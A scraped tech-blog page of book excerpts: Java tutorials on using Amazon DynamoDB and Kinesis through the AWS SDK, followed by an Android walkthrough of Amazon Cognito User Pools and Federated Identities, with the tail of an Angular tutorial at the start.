following: form{ margin-top: 20px; margin-left: 20%; size: 50px; } table{ margin-top:20px; height: 50%; width: 50%; margin-left: 20%; } button{ margin-left: 20px; } Running the app Open up two command line interfaces/terminals. In both of them, navigate to the project directory. Run node server.js to start the server in one. Run ng serve in the other to serve the Angular 2 app. Open up the browser and go to localhost:4200. In this simple users app, we can perform all CRUD operations. We can create new users, get users, delete users, and update the state of users. By default, a newly added user's active state is false. That can be changed by clicking on the change state button. We created an Angular app from scratch for building a user directory. To know more, on how to write unit tests and perform debugging in Angular, check our book TypeScript 2.x for Angular Developers. Everything new in Angular 6: Angular Elements, CLI commands and more Why switch to Angular for web development – Interview with Minko Gechev Building Components Using Angular
Read more
  • 0
  • 0
  • 27551
article-image-applications-with-aws-services-amazon-dynamodb-amazon-kinesis
Natasha Mathur
05 Jul 2018
17 min read
Save for later

Integrate applications with AWS services: Amazon DynamoDB & Amazon Kinesis [Tutorial]

Natasha Mathur
05 Jul 2018
17 min read
AWS provides hybrid capabilities for networking, storage, database, application development, and management tools for secure and seamless integration. In today's tutorial, we will integrate applications with the two popular AWS services namely Amazon DynamoDB and Amazon Kinesis. Amazon DynamoDB is a fast, fully managed, highly available, and scalable NoSQL database service from AWS. DynamoDB uses key-value and document store data models. Amazon Kinesis is used to collect real-time data to process and analyze it. This article is an excerpt from a book 'Expert AWS Development' written by Atul V. Mistry. By the end of this tutorial, you will know how to integrate applications with the relative AWS services and best practices. Amazon DynamoDB The Amazon DynamoDB service falls under the Database category. It is a fast NoSQL database service from Amazon. It is highly durable as it will replicate data across three distinct geographical facilities in AWS regions. It's great for web, mobile, gaming, and IoT applications. DynamoDB will take care of software patching, hardware provisioning, cluster scaling, setup, configuration, and replication. You can create a database table and store and retrieve any amount and variety of data. It will delete expired data automatically from the table. It will help to reduce the usage storage and cost of storing data which is no longer needed. Amazon DynamoDB Accelerator (DAX) is a highly available, fully managed, and in-memory cache. For millions of requests per second, it reduces the response time from milliseconds to microseconds. DynamoDB is allowed to store up to 400 KB of large text and binary objects. It uses SSD storage to provide high I/O performance. Integrating DynamoDB into an application The following diagram provides a high-level overview of integration between your application and DynamoDB: Please perform the following steps to understand this integration: Your application in your programming language which is using an AWS SDK. DynamoDB can work with one or more programmatic interfaces provided by AWS SDK. From your programming language, AWS SDK will construct an HTTP or HTTPS request with a DynamoDB low-level API. The AWS SDK will send a request to the DynamoDB endpoint. DynamoDB will process the request and send the response back to the AWS SDK. If the request is executed successfully, it will return HTTP 200 (OK) response code. If the request is not successful, it will return HTTP error code and error message. The AWS SDK will process the response and send the result back to the application. The AWS SDK provides three kinds of interfaces to connect with DynamoDB. These interfaces are as follows: Low-level interface Document interface Object persistence (high-level) interface Let's explore all three interfaces. The following diagram is the Movies table, which is created in DynamoDB and used in all our examples: Low-level interface AWS SDK programming languages provide low-level interfaces for DynamoDB. These SDKs provide methods that are similar to low-level DynamoDB API requests. The following example uses the Java language for the low-level interface of AWS SDKs. Here you can use Eclipse IDE for the example. In this Java program, we request getItem from the Movies table, pass the movie name as an attribute, and print the movie release year: Let's create the MovieLowLevelExample file. We have to import a few classes to work with the DynamoDB. AmazonDynamoDBClient is used to create the DynamoDB client instance. AttributeValue is used to construct the data. In AttributeValue, name is datatype and value is data: GetItemRequest is the input of GetItem GetItemResult is the output of GetItem The following code will create the dynamoDB client instance. You have to assign the credentials and region to this instance: Static AmazonDynamoDBClient dynamoDB; In the code, we have created HashMap, passing the value parameter as AttributeValue().withS(). It contains actual data and withS is the attribute of String: String tableName = "Movies"; HashMap<String, AttributeValue> key = new HashMap<String, AttributeValue>(); key.put("name", new AttributeValue().withS("Airplane")); GetItemRequest will create a request object, passing the table name and key as a parameter. It is the input of GetItem: GetItemRequest request = new GetItemRequest() .withTableName(tableName).withKey(key); GetItemResult will create the result object. It is the output of getItem where we are passing request as an input: GetItemResult result = dynamoDB.getItem(request); It will check the getItem null condition. If getItem is not null then create the object for AttributeValue. It will get the year from the result object and create an instance for yearObj. It will print the year value from yearObj: if (result.getItem() != null) { AttributeValue yearObj = result.getItem().get("year"); System.out.println("The movie Released in " + yearObj.getN()); } else { System.out.println("No matching movie was found"); } Document interface This interface enables you to do Create, Read, Update, and Delete (CRUD) operations on tables and indexes. The datatype will be implied with data from this interface and you do not need to specify it. The AWS SDKs for Java, Node.js, JavaScript, and .NET provides support for document interfaces. The following example uses the Java language for the document interface in AWS SDKs. Here you can use the Eclipse IDE for the example. In this Java program, we will create a table object from the Movies table, pass the movie name as attribute, and print the movie release year. We have to import a few classes. DynamoDB is the entry point to use this library in your class. GetItemOutcomeis is used to get items from the DynamoDB table. Table is used to get table details: static AmazonDynamoDB client; The preceding code will create the client instance. You have to assign the credentials and region to this instance: String tableName = "Movies"; DynamoDB docClient = new DynamoDB(client); Table movieTable = docClient.getTable(tableName); DynamoDB will create the instance of docClient by passing the client instance. It is the entry point for the document interface library. This docClient instance will get the table details by passing the tableName and assign it to the movieTable instance: GetItemOutcome outcome = movieTable.getItemOutcome("name","Airplane"); int yearObj = outcome.getItem().getInt("year"); System.out.println("The movie was released in " + yearObj); GetItemOutcome will create an outcome instance from movieTable by passing the name as key and movie name as parameter. It will retrieve the item year from the outcome object and store it into the yearObj object and print it: Object persistence (high-level) interface In the object persistence interface, you will not perform any CRUD operations directly on the data; instead, you have to create objects which represent DynamoDB tables and indexes and perform operations on those objects. It will allow you to write object-centric code and not database-centric code. The AWS SDKs for Java and .NET provide support for the object persistence interface. Let's create a DynamoDBMapper object in AWS SDK for Java. It will represent data in the Movies table. This is the MovieObjectMapper.java class. Here you can use the Eclipse IDE for the example. You need to import a few classes for annotations. DynamoDBAttribute is applied to the getter method. If it will apply to the class field then its getter and setter method must be declared in the same class. The DynamoDBHashKey annotation marks property as the hash key for the modeled class. The DynamoDBTable annotation marks DynamoDB as the table name: @DynamoDBTable(tableName="Movies") It specifies the table name: @DynamoDBHashKey(attributeName="name") public String getName() { return name;} public void setName(String name) {this.name = name;} @DynamoDBAttribute(attributeName = "year") public int getYear() { return year; } public void setYear(int year) { this.year = year; } In the preceding code, DynamoDBHashKey has been defined as the hash key for the name attribute and its getter and setter methods. DynamoDBAttribute specifies the column name and its getter and setter methods. Now create MovieObjectPersistenceExample.java to retrieve the movie year: static AmazonDynamoDB client; The preceding code will create the client instance. You have to assign the credentials and region to this instance. You need to import DynamoDBMapper, which will be used to fetch the year from the Movies table: DynamoDBMapper mapper = new DynamoDBMapper(client); MovieObjectMapper movieObjectMapper = new MovieObjectMapper(); movieObjectMapper.setName("Airplane"); The mapper object will be created from DynamoDBMapper by passing the client. The movieObjectMapper object will be created from the POJO class, which we created earlier. In this object, set the movie name as the parameter: MovieObjectMapper result = mapper.load(movieObjectMapper); if (result != null) { System.out.println("The song was released in "+ result.getYear()); } Create the result object by calling DynamoDBMapper object's load method. If the result is not null then it will print the year from the result's getYear() method. DynamoDB low-level API This API is a protocol-level interface which will convert every HTTP or HTTPS request into the correct format with a valid digital signature. It uses JavaScript Object Notation (JSON) as a transfer protocol. AWS SDK will construct requests on your behalf and it will help you concentrate on the application/business logic. The AWS SDK will send a request in JSON format to DynamoDB and DynamoDB will respond in JSON format back to the AWS SDK API. DynamoDB will not persist data in JSON format. Troubleshooting in Amazon DynamoDB The following are common problems and their solutions: If error logging is not enabled then enable it and check error log messages. Verify whether the DynamoDB table exists or not. Verify the IAM role specified for DynamoDB and its access permissions. AWS SDKs take care of propagating errors to your application for appropriate actions. Like Java programs, you should write a try-catch block to handle the error or exception. If you are not using an AWS SDK then you need to parse the content of low-level responses from DynamoDB. A few exceptions are as follows: AmazonServiceException: Client request sent to DynamoDB but DynamoDB was unable to process it and returned an error response AmazonClientException: Client is unable to get a response or parse the response from service ResourceNotFoundException: Requested table doesn't exist or is in CREATING state Now let's move on to Amazon Kinesis, which will help to collect and process real-time streaming data. Amazon Kinesis The Amazon Kinesis service is under the Analytics product category. This is a fully managed, real-time, highly scalable service. You can easily send data to other AWS services such as Amazon DynamoDB, AmazaonS3, and Amazon Redshift. You can ingest real-time data such as application logs, website clickstream data, IoT data, and social stream data into Amazon Kinesis. You can process and analyze data when it comes and responds immediately instead of waiting to collect all data before the process begins. Now, let's explore an example of using Kinesis streams and Kinesis Firehose using AWS SDK API for Java. Amazon Kinesis streams In this example, we will create the stream if it does not exist and then we will put the records into the stream. Here you can use Eclipse IDE for the example. You need to import a few classes. AmazonKinesis and AmazonKinesisClientBuilder are used to create the Kinesis clients. CreateStreamRequest will help to create the stream. DescribeStreamRequest will describe the stream request. PutRecordRequest will put the request into the stream and PutRecordResult will print the resulting record. ResourceNotFoundException will throw an exception when the stream does not exist. StreamDescription will provide the stream description: Static AmazonKinesis kinesisClient; kinesisClient is the instance of AmazonKinesis. You have to assign the credentials and region to this instance: final String streamName = "MyExampleStream"; final Integer streamSize = 1; DescribeStreamRequest describeStreamRequest = new DescribeStreamRequest().withStreamName(streamName); Here you are creating an instance of describeStreamRequest. For that, you will pass the streamNameas parameter to the withStreamName() method: StreamDescription streamDescription = kinesisClient.describeStream(describeStreamRequest).getStreamDescription(); It will create an instance of streamDescription. You can get information such as the stream name, stream status, and shards from this instance: CreateStreamRequest createStreamRequest = new CreateStreamRequest(); createStreamRequest.setStreamName(streamName); createStreamRequest.setShardCount(streamSize); kinesisClient.createStream(createStreamRequest); The createStreamRequest instance will help to create a stream request. You can set the stream name, shard count, and SDK request timeout. In the createStream method, you will pass the createStreamRequest: long createTime = System.currentTimeMillis(); PutRecordRequest putRecordRequest = new PutRecordRequest(); putRecordRequest.setStreamName(streamName); putRecordRequest.setData(ByteBuffer.wrap(String.format("testData-%d", createTime).getBytes())); putRecordRequest.setPartitionKey(String.format("partitionKey-%d", createTime)); Here we are creating a record request and putting it into the stream. We are setting the data and PartitionKey for the instance. It will create the records: PutRecordResult putRecordResult = kinesisClient.putRecord(putRecordRequest); It will create the record from the putRecord method and pass putRecordRequest as a parameter: System.out.printf("Success : Partition key "%s", ShardID "%s" and SequenceNumber "%s".n", putRecordRequest.getPartitionKey(), putRecordResult.getShardId(), putRecordResult.getSequenceNumber()); It will print the output on the console as follows: Troubleshooting tips for Kinesis streams The following are common problems and their solutions: Unauthorized KMS master key permission error: Without authorized permission on the master key, when a producer or consumer application tries to writes or reads an encrypted stream Provide access permission to an application using Key policies in AWS KMS or IAM policies with AWS KMS Sometimes producer becomes writing slower. Service limits exceeded: Check whether the producer is throwing throughput exceptions from the service, and validate what API operations are being throttled. You can also check Amazon Kinesis Streams limits because of different limits based on the call. If calls are not an issue, check you have selected a partition key that allows distributing put operations evenly across all shards, and that you don't have a particular partition key that's bumping into the service limits when the rest are not. This requires you to measure peak throughput and the number of shards in your stream. Producer optimization: It has either a large producer or small producer. A large producer is running from an EC2 instance or on-premises while a small producer is running from the web client, mobile app, or IoT device. Customers can use different strategies for latency. Kinesis Produce Library or multiple threads are useful while writing for buffer/micro-batch records, PutRecords for multi-record operation, PutRecord for single-record operation. Shard iterator expires unexpectedly: The shard iterator expires because its GetRecord methods have not been called for more than 5 minutes, or you have performed a restart of your consumer application. The shard iterator expires immediately before you use it. This might indicate that the DynamoDB table used by Kinesis does not have enough capacity to store the data. It might happen if you have a large number of shards. Increase the write capacity assigned to the shard table to solve this. Consumer application is reading at a slower rate: The following are common reasons for read throughput being slower than expected: Total reads for multiple consumer applications exceed per-shard limits. In the Kinesis stream, increase the number of shards. Maximum number of GetRecords per call may have been configured with a low limit value. The logic inside the processRecords call may be taking longer for a number of possible reasons; the logic may be CPU-intensive, bottlenecked on synchronization, or I/O blocking. We have covered Amazon Kinesis streams. Now, we will cover Kinesis Firehose. Amazon Kinesis Firehose Amazon Kinesis Firehose is a fully managed, highly available and durable service to load real-time streaming data easily into AWS services such as Amazon S3, Amazon Redshift, or Amazon Elasticsearch. It replicates your data synchronously at three different facilities. It will automatically scale as per throughput data. You can compress your data into different formats and also encrypt it before loading. AWS SDK for Java, Node.js, Python, .NET, and Ruby can be used to send data to a Kinesis Firehose stream using the Kinesis Firehose API. The Kinesis Firehose API provides two operations to send data to the Kinesis Firehose delivery stream: PutRecord: In one call, it will send one record PutRecordBatch: In one call, it will send multiple data records Let's explore an example using PutRecord. In this example, the MyFirehoseStream stream has been created. Here you can use Eclipse IDE for the example. You need to import a few classes such as AmazonKinesisFirehoseClient, which will help to create the client for accessing Firehose. PutRecordRequest and PutRecordResult will help to put the stream record request and its result: private static AmazonKinesisFirehoseClient client; AmazonKinesisFirehoseClient will create the instance firehoseClient. You have to assign the credentials and region to this instance: String data = "My Kinesis Firehose data"; String myFirehoseStream = "MyFirehoseStream"; Record record = new Record(); record.setData(ByteBuffer.wrap(data.getBytes(StandardCharsets.UTF_8))); As mentioned earlier, myFirehoseStream has already been created. A record in the delivery stream is a unit of data. In the setData method, we are passing a data blob. It is base-64 encoded. Before sending a request to the AWS service, Java will perform base-64 encoding on this field. A returned ByteBuffer is mutable. If you change the content of this byte buffer then it will reflect to all objects that have a reference to it. It's always best practice to call ByteBuffer.duplicate() or ByteBuffer.asReadOnlyBuffer() before reading from the buffer or using it. Now you have to mention the name of the delivery stream and the data records you want to create the PutRecordRequest instance: PutRecordRequest putRecordRequest = new PutRecordRequest() .withDeliveryStreamName(myFirehoseStream) .withRecord(record); putRecordRequest.setRecord(record); PutRecordResult putRecordResult = client.putRecord(putRecordRequest); System.out.println("Put Request Record ID: " + putRecordResult.getRecordId()); putRecordResult will write a single record into the delivery stream by passing the putRecordRequest and get the result and print the RecordID: PutRecordBatchRequest putRecordBatchRequest = new PutRecordBatchRequest().withDeliveryStreamName("MyFirehoseStream") .withRecords(getBatchRecords()); You have to mention the name of the delivery stream and the data records you want to create the PutRecordBatchRequest instance. The getBatchRecord method has been created to pass multiple records as mentioned in the next step: JSONObject jsonObject = new JSONObject(); jsonObject.put("userid", "userid_1"); jsonObject.put("password", "password1"); Record record = new Record().withData(ByteBuffer.wrap(jsonObject.toString().getBytes())); records.add(record); In the getBatchRecord method, you will create the jsonObject and put data into this jsonObject . You will pass jsonObject to create the record. These records add to a list of records and return it: PutRecordBatchResult putRecordBatchResult = client.putRecordBatch(putRecordBatchRequest); for(int i=0;i<putRecordBatchResult.getRequestResponses().size();i++){ System.out.println("Put Batch Request Record ID :"+i+": " + putRecordBatchResult.getRequestResponses().get(i).getRecordId()); } putRecordBatchResult will write multiple records into the delivery stream by passing the putRecordBatchRequest, get the result, and print the RecordID. You will see the output like the following screen: Troubleshooting tips for Kinesis Firehose Sometimes data is not delivered at specified destinations. The following are steps to solve common issues while working with Kinesis Firehose: Data not delivered to Amazon S3: If error logging is not enabled then enable it and check error log messages for delivery failure. Verify that the S3 bucket mentioned in the Kinesis Firehose delivery stream exists. Verify whether data transformation with Lambda is enabled, the Lambda function mentioned in your delivery stream exists, and Kinesis Firehose has attempted to invoke the Lambda function. Verify whether the IAM role specified in the delivery stream has given proper access to the S3 bucket and Lambda function or not. Verify your Kinesis Firehose metrics to check whether the data was sent to the Kinesis Firehose delivery stream successfully. Data not delivered to Amazon Redshift/Elasticsearch: For Amazon Redshift and Elasticsearch, verify the points mentioned in Data not delivered to Amazon S3, including the IAM role, configuration, and public access. For CloudWatch and IoT, delivery stream not available as target: Some AWS services can only send messages and events to a Kinesis Firehose delivery stream which is in the same region. Verify that your Kinesis Firehose delivery stream is located in the same region as your other services. We completed implementations, examples, and best practices for Amazon DynamoDB and Amazon Kinesis AWS services using AWS SDK. If you found this post useful, do check out the book 'Expert AWS Development' to learn application integration with other AWS services like Amazon Lambda, Amazon SQS, and Amazon SWF. A serverless online store on AWS could save you money. Build one. Why is AWS the preferred cloud platform for developers working with big data? Verizon chooses Amazon Web Services(AWS) as its preferred cloud provider
Read more
  • 0
  • 1
  • 51765

article-image-amazon-cognito-for-secure-mobile-and-web-user-authentication-tutorial
Natasha Mathur
04 Jul 2018
13 min read
Save for later

Amazon Cognito for secure mobile and web user authentication [Tutorial]

Natasha Mathur
04 Jul 2018
13 min read
Amazon Cognito is a user authentication service that enables user sign-up and sign-in, and access control for mobile and web applications, easily, quickly, and securely. In Amazon Cognito, you can create your user directory, which allows the application to work when the devices are not online. Amazon Cognito supports, to scale, millions of users and authenticates users from social identity providers such as Facebook, Google, Twitter, Amazon, or enterprise identity providers, such as Microsoft Active Directory through SAML, or your own identity provider system. Today, we will discuss the AWS Cognito service for simple and secure user authentication for mobile and web applications. With Amazon Cognito, you can concentrate on developing great application experiences for the user, instead of worrying about developing secure and scalable application solutions for handling the access control permissions of users and synchronization across the devices. Let's explore topics that fall under AWS Cognito and see how it can be used for user authentication from AWS. This article is an excerpt from a book 'Expert AWS Development' written by Atul V. Mistry. Amazon Cognito benefits Amazon Cognito is a fully managed service and it provides User Pools for a secure user directory to scale millions of users; these User Pools are easy to set up. Amazon Cognito User Pools are standards-based identity providers, Amazon Cognito supports many identity and access management standards such as OAuth 2.0, SAML 2.0, OAuth 2.0 and OpenID Connect. Amazon Cognito supports the encryption of data in transit or at rest and multi-factor authentication. With Amazon Cognito, you can control access to the backend resource from the application. You can control the users by defining roles and map different roles for the application, so they can access the application resource for which they are authorized. Amazon Cognito can integrate easily with the sign-up and sign-in for the app because it provides a built-in UI and configuration for different federating identity providers. It provides the facility to customize the UI, as per company branding, in front and center for user interactions. Amazon Cognito is eligible for HIPAA-BAA and is compliant with PCI DSS, SOC 1-3, and ISO 27001. Amazon Cognito features Amazon Cognito provides the following features: Amazon Cognito Identity User Pools Federated Identities Amazon Cognito Sync Data synchronization Today we will discuss User Pools and Federated Identities in detail. Amazon Cognito User Pools Amazon Cognito User Pools helps to create and maintain a directory for users and adds sign-up/sign-in to mobile or web applications. Users can sign in to a User Pool through social or SAML-based identity providers. Enhanced security features such as multi-factor authentication and email/phone number verification can be implemented for your application. With AWS Lambda, you can customize your workflows for Amazon Cognito User Pools such as adding application specific logins for user validation and registration for fraud detection. Getting started with Amazon Cognito User Pools You can create Amazon Cognito User Pools through Amazon Cognito Console, AWS Command Line Interface (CLI), or Amazon Cognito Application Programming Interface (API). Now let's understand all these different ways of creating User Pools. Amazon Cognito User Pool creation from the console Please perform the following steps to create a User Pool from the console. Log in to the AWS Management console and select the Amazon Cognito service. It will show you two options, such as Manage your User Pools and Manage Federated Identities, as shown: Select Manage Your User Pools. It will take you to the Create a user pool screen. You can add the Pool name and create the User Pool. You can create this user pool in two different ways, by selecting: Review defaults: It comes with default settings and if required, you can customize it Step through settings: Step by step, you can customize each setting: When you select Review defaults, you will be taken to the review User Pool configuration screen and then select Create pool. When you will select Step through settings, you will be taken to the Attributes screen to customize it. Let's understand all the screens in brief: Attributes: This gives the option for users to sign in with a username, email address, or phone number. You can select standard attributes for user profiles as well create custom attributes. Policies: You can set the password strength, allow users to sign in themselves, and stipulate days until expire for the newly created account. MFA and verifications: This allows you to enable Multi-Factor Authentication, and configure require verification for emails and phone numbers. You create a new IAM role to set permissions for Amazon Cognito that allows you to send SMS message to users on your behalf. Message customizations: You can customize messages to verify an email address by providing a verification code or link. You can customize user invitation messages for SMS and email but you must include the username and a temporary password. You can customize email addresses from SES-verified identities. Tags: You can add tags for this User Pool by providing tag keys and their values. Devices: This provides settings to remember a user's device. It provides options such as Always, User Opt In, and No. App clients: You can add app clients by giving unique IDs and an optional secret key to access this User Pool. Triggers: You can customize workflows and user experiences by triggering AWS Lambda functions for different events. Reviews: This shows you all the attributes for review. You can edit any attribute on the Reviews screen and then click on Create pool. It will create the User Pool. After creating a new User Pool, navigate to the App clients screen. Enter the App client name as CognitoDemo and click on Create app client: Once this Client App is generated, you can click on the show details to see App client secret: Pool Id, App client id, and App client secret are required to connect any application to Amazon Cognito. Now, we will explore an Amazon Cognito User Pool example to sign up and sign in the user. Amazon Cognito example for Android with mobile SDK In this example, we will perform some tasks such as create a new user, request confirmation code for a new user through email, confirm user, user login, and so on. Create a Cognito User Pool: To create a User Pool with the default configuration, you have to pass parameters to the CognitoUserPool constructor, such as application context, userPoolId, clientId, clientSecret, and cognitoRegion (optional): CognitoUserPool userPool = new CognitoUserPool(context, userPoolId, clientId, clientSecret, cognitoRegion); New user sign-up: Please perform the following steps to sign up new users: Collect information from users such as username, password, given name, phone number, and email address. Now, create the CognitoUserAttributes object and add the user value in a key-value pair to sign up for the user: CognitoUserAttributes userAttributes = new CognitoUserAttributes(); String usernameInput = username.getText().toString(); String userpasswordInput = password.getText().toString(); userAttributes.addAttribute("Name", name.getText().toString()); userAttributes.addAttribute("Email", email.getText().toString()); userAttributes.addAttribute("Phone", phone.getText().toString()); userPool.signUpInBackground(usernameInput, userpasswordInput, userAttributes, null, signUpHandler); To register or sign up a new user, you have to call SignUpHandler. It contains two methods: onSuccess and onFailure. For onSuccess, it will call when it successfully registers a new user. The user needs to confirm the code required to activate the account. You have to pass parameters such as Cognito user, confirm the state of the user, medium and destination of the confirmation code, such as email or phone, and the value for that: SignUpHandler signUpHandler = new SignUpHandler() { @Override public void onSuccess(CognitoUser user, boolean signUpConfirmationState, CognitoUserCodeDeliveryDetails cognitoUserCodeDeliveryDetails) { // Check if the user is already confirmed if (signUpConfirmationState) { showDialogMessage("New User Sign up successful!","Your Username is : "+usernameInput, true); } } @Override public void onFailure(Exception exception) { showDialogMessage("New User Sign up failed.",AppHelper.formatException(exception),false); } }; You can see on the User Pool console that the user has been successfully signed up but not confirmed yet: Confirmation code request: After successfully signing up, the user needs to confirm the code for sign-in. The confirmation code will be sent to the user's email or phone. Sometimes it may automatically confirm the user by triggering a Lambda function. If you selected automatic verification when you created the User Pool, it will send the confirmation code to your email or phone. You can let the user know where they will get the confirmation code from the cognitoUserCodeDeliveryDetails object. It will indicate where you will send the confirmation code: VerificationHandler resendConfCodeHandler = new VerificationHandler() { @Override public void onSuccess(CognitoUserCodeDeliveryDetails details) { showDialogMessage("Confirmation code sent.","Code sent to "+details.getDestination()+" via "+details.getDeliveryMedium()+".", false); } @Override public void onFailure(Exception exception) { showDialogMessage("Confirmation code request has failed", AppHelper.formatException(exception), false); } }; In this case, the user will receive an email with the confirmation code: The user can complete the sign-up process after entering the valid confirmation code. To confirm the user, you need to call the GenericHandler. AWS SDK uses this GenericHandler to communicate the result of the confirmation API: GenericHandler confHandler = new GenericHandler() { @Override public void onSuccess() { showDialogMessage("Success!",userName+" has been confirmed!", true); } @Override public void onFailure(Exception exception) { showDialogMessage("Confirmation failed", exception, false); } }; Once the user confirms, it will be updated in the Amazon Cognito console: Sign in user to the app: You must create an authentication callback handler for the user to sign in to your application. The following code will show you how the interaction happens from your app and SDK: // call Authentication Handler for User sign-in process. AuthenticationHandler authHandler = new AuthenticationHandler() { @Override public void onSuccess(CognitoUserSession cognitoUserSession) { launchUser(); // call Authentication Handler for User sign-in process. AuthenticationHandler authHandler = new AuthenticationHandler() { @Override public void onSuccess(CognitoUserSession cognitoUserSession) { launchUser(); } @Override public void getAuthenticationDetails(AuthenticationContinuation continuation, String username) { // Get user sign-in credential information from API. AuthenticationDetails authDetails = new AuthenticationDetails(username, password, null); // Send this user sign-in information for continuation continuation.setAuthenticationDetails(authDetails); // Allow user sign-in process to continue continuation.continueTask(); } @Override public void getMFACode(MultiFactorAuthenticationContinuation mfaContinuation) { // Get Multi-factor authentication code from user to sign-in mfaContinuation.setMfaCode(mfaVerificationCode); // Allow user sign-in process to continue mfaContinuation.continueTask(); } @Override public void onFailure(Exception e) { // User Sign-in failed. Please check the exception showDialogMessage("Sign-in failed", e); } @Override public void authenticationChallenge(ChallengeContinuation continuation) { /** You can implement Custom authentication challenge logic * here. Pass the user's responses to the continuation. */ } }; Access AWS resources from application user: A user can access AWS resource from the application by creating an AWS Cognito Federated Identity Pool and associating an existing User Pool with that Identity Pool, by specifying User Pool ID and App client id. Please see the next section (Step 5) to create the Federated Identity Pool with Cognito. Let's continue with the same application; after the user is authenticated, add the user's identity token to the logins map in the credential provider. The provider name depends on the Amazon Cognito User Pool ID and it should have the following structure: cognito-idp.<USER_POOL_REGION>.amazonaws.com/<USER_POOL_ID> For this example, it will be: cognito-idp.us-east-1.amazonaws.com/us-east-1_XUGRPHAWA. Now, in your credential provider, pass the ID token that you get after successful authentication: // After successful authentication get id token from // CognitoUserSession String idToken = cognitoUserSession.getIdToken().getJWTToken(); // Use an existing credential provider or create new CognitoCachingCredentialsProvider credentialsProvider = new CognitoCachingCredentialsProvider(context, IDENTITY_POOL_ID, REGION); // Credentials provider setup Map<String, String> logins = new HashMap<String, String>(); logins.put("cognito-idp.us-east-1.amazonaws.com/us-east-1_ XUGRPHAWA", idToken); credentialsProvider.setLogins(logins); You can use this credential provider to access AWS services, such as Amazon DynamoDB, as follows: AmazonDynamoDBClient dynamoDBClient = new AmazonDynamoDBClient(credentialsProvider) You have to provide the specific IAM permission to access AWS services, such as DynamoDB. You can add this permission to the Federated Identities, as mentioned in the following Step 6, by editing the View Policy Document. Once you have attached the appropriate policy, for example, AmazonDynamoDBFullAccess, for this application, you can perform the operations such as create, read, update, and delete operations in DynamoDB. Now, we will look at how to create the Amazon Cognito Federated Identities. Amazon Cognito Federated Identities Amazon Cognito Federated Identities enables you to create unique identities for the user and, authenticate with Federated Identity Providers. With this identity, the user will get temporary, limited-privilege AWS credentials. With these credentials, the user can synchronize their data with Amazon Cognito Sync or securely access other AWS services such as Amazon S3, Amazon DynamoDB, and Amazon API Gateway. It supports Federated Identity providers such as Twitter, Amazon, Facebook, Google, OpenID Connect providers, or SAML identity providers, unauthenticated identities. It also supports developer-authenticated identities from which you can register and authenticate the users through your own backend authentication systems. You need to create an Identity Pool to use Amazon Cognito Federated Identities in your application. This Identity Pool is specific for your account to store user identity data. Creating a new Identity Pool from the console Please perform the following steps to create a new Identity Pool from the console: Log in to the AWS Management console and select the Amazon Cognito Service. It will show you two options: Manage your User Pools and Manage Federated Identities. Select Manage Federated Identities. It will navigate you to the Create new identity pool screen. Enter a unique name for the Identity pool name: You can enable unauthenticated identities by selecting Enable access to unauthenticated identities from the collapsible section: Under Authentication providers, you can allow your users to authenticate using any of the authentication methods. Click on Create pool. You must select at least one identity from Authentication providers to create a valid Identity Pool. Here Cognito has been selected for a valid Authentication provider by adding User Pool ID and App client id: It will navigate to the next screen to create a new IAM role by default, to provide limited permission to end users. These permissions are for Cognito Sync and Mobile Analytics but you can edit policy documents to add/update permissions for more services. It will create two IAM roles. One for authenticated users that are supported by identity providers and another for unauthenticated users, known as guest users. Click Allow to generate the Identity Pool: Once the Identity Pool is generated, it will navigate to the Getting started with Amazon Cognito screen for that Identity Pool. Here, it will provide you with downloadable AWS SDK for different platforms such as Android, iOS - Objective C, iOS - Swift, JavaScript, Unity, Xamarin, and .NET. It also provides sample code for Get AWS Credentials and Store User Data: You have created Amazon Cognito Federated Identities. We looked at how user authentication process in AWS Cognito works with User Pools and Federated Identities. If you found this post useful, check out the book 'Expert AWS Development' to learn other concepts such as Amazon Cognito sync, traditional web hosting etc, in AWS development. Keep your serverless AWS applications secure [Tutorial] Amazon Neptune, AWS’ cloud graph database, is now generally available How to start using AWS
Read more
  • 0
  • 3
  • 30392
Modal Close icon
Modal Close icon